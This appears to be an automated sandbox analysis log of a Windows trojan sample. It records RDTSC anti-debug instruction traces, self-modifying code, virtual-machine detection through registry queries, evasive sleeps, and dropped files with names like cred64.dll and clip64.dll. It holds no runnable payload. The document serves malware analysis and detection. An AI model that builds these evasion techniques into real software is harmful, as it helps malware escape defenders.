Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F807CF second address: 4F807E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80923 second address: 4F80954 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F362081F5A7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80954 second address: 4F809B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3620DC90FFh 0x00000009 adc al, FFFFFFDEh 0x0000000c jmp 00007F3620DC9109h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F3620DC9100h 0x00000018 sub cx, C0D8h 0x0000001d jmp 00007F3620DC90FBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 je 00007F3692D6EAF0h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f mov cx, 73A1h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F809B6 second address: 4F80A06 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F362081F5A3h 0x0000000c and si, 884Eh 0x00000011 jmp 00007F362081F5A9h 0x00000016 popfd 0x00000017 popad 0x00000018 test byte ptr [76FB6968h], 00000002h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F362081F59Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80A06 second address: 4F80A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7867BB12h 0x00000008 movsx edx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F3692D6EA98h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F3620DC9107h 0x0000001d jmp 00007F3620DC9103h 0x00000022 popfd 0x00000023 movzx eax, di 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80A4D second address: 4F80A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90DF1 second address: 4F90DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90DF7 second address: 4F90DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90DFB second address: 4F90E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3620DC9107h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movzx eax, dx 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3620DC9106h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90E3D second address: 4F90E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90E43 second address: 4F90E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90AEE second address: 4F90AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90AFD second address: 4F90B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90B03 second address: 4F90B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, 3FA9h 0x0000000e jmp 00007F362081F5A6h 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F362081F5A0h 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov edi, esi 0x00000021 push ecx 0x00000022 mov ax, bx 0x00000025 pop edx 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F362081F59Ah 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90B55 second address: 4F90B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F90B59 second address: 4F90B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5010793 second address: 5010797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5010797 second address: 501079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 501079D second address: 50107E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov bh, BEh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F3620DC9105h 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3620DC90FDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50107E3 second address: 5010802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushad 0x0000000f jmp 00007F362081F59Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5010802 second address: 5010818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3620DC90FDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000897 second address: 500089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500089D second address: 50008A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50008A1 second address: 50008FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F362081F59Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov cx, 621Dh 0x00000016 mov ecx, 184D0319h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F362081F5A1h 0x00000026 pushfd 0x00000027 jmp 00007F362081F5A0h 0x0000002c sbb ax, 27D8h 0x00000031 jmp 00007F362081F59Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50008FD second address: 5000915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000915 second address: 500093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F362081F5A0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500093B second address: 500093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500093F second address: 5000945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000945 second address: 500094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500073A second address: 500073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 500073E second address: 5000744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000744 second address: 50007AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F362081F59Fh 0x0000000c sub si, 9F7Eh 0x00000011 jmp 00007F362081F5A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F362081F59Eh 0x00000020 push eax 0x00000021 jmp 00007F362081F59Bh 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F362081F5A5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50007AF second address: 50007D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3620DC90FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 50007D5 second address: 5000843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F362081F5A7h 0x00000009 adc esi, 544F14FEh 0x0000000f jmp 00007F362081F5A9h 0x00000014 popfd 0x00000015 movzx ecx, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F362081F5A4h 0x00000025 adc si, 5B28h 0x0000002a jmp 00007F362081F59Bh 0x0000002f popfd 0x00000030 push esi 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000843 second address: 5000848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0277 second address: 4FA027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA027B second address: 4FA027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA027F second address: 4FA0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0285 second address: 4FA029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9102h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA029B second address: 4FA029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA029F second address: 4FA02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, dl 0x0000000c pushfd 0x0000000d jmp 00007F3620DC9106h 0x00000012 or ch, 00000048h 0x00000015 jmp 00007F3620DC90FBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 call 00007F3620DC9101h 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA02EC second address: 4FA0305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0305 second address: 4FA0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0309 second address: 4FA030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C2F second address: 5000C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9108h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C4B second address: 5000C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 5000C59 second address: 5000C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Special instruction interceptor: First address: B6C005 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Special instruction interceptor: First address: D49E4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 4EC005 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 6C9E4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 24CB65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 3EBEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Special instruction interceptor: First address: 3F471F instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: AECB65 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C8BEAE instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: C9471F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 50B99A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 50BA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 6AF951 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Special instruction interceptor: First address: 73764A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 1CB99A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 1CBA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 36F951 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Special instruction interceptor: First address: 3F764A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: F7CB65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 111BEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 112471F instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_05000D4A rdtsc 0_2_05000D4A
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5205
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6976 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6976 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2492 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2492 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep count: 304 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep time: -9120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2120 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2120 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6700 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2944 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2944 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6996 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3180 Thread sleep count: 53 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3180 Thread sleep time: -53000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4336 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 7124 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 5236 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 168 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 7128 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 4856 Thread sleep count: 89 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5808 Thread sleep time: -46023s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3688 Thread sleep time: -42021s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 36 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 145 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 92 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4884 Thread sleep time: -36018s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3408 Thread sleep time: -30015s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2380 Thread sleep count: 34 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1312 Thread sleep time: -42021s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3152 Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3512 Thread sleep time: -36018s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 143 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3444 Thread sleep time: -44022s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 89 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3320 Thread sleep time: -38019s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1508 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 772 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 95 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 102 > 30
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe TID: 3228 Thread sleep count: 90 > 30
